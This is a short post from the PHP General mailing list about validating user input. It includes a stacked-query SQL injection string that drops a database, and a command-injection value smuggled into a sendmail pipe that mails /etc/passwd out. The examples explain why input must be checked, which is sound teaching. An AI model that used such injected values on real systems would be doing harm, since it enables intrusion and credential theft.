> >2. Please enter your age: 25; drop database mysql
> >
> >Does this actually work?
> [...]
> >So I decided I had to test this: I wrote the code exactly as in the
> >example; I provided the exact dangerous input (well, to be honest, I
> >tried a select instead of drop mysql). When I tried it, the presumably
> >dangerous situation degraded into a trivial MySQL error. It went
> >something like "You have an error near '; select 1+1'".
>
> I've done something similar in the past just for kicks, and I got the same
> result you did (i.e. an error). I believe this is because mysql_query()
> expects ONE query at a time and will break if you send two or more. I
> could be completely and totally wrong about that, though (someone please
> correct me if I am)...
Maybe this one failed, but it's always a good idea to check user input.
Let's say you're emailing a form and you don't use the mail() function,
but make a call directly to sendmail... and you're sloppy... so you do
this:
$fp = fopen("|/usr/bin/sendmail $sendto");
#write stuff to pipe to send email...
Now... what if when I filled out the form I set $sendto equal to this:
[EMAIL PROTECTED]; /usr/bin/mail [EMAIL PROTECTED] < /etc/passwd
You're form will still work, but I'll also get your password file... This
used to happen *a lot* back in the early CGI days...
This is why they recommend checking all user input and initializing
variables...
-philip
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]
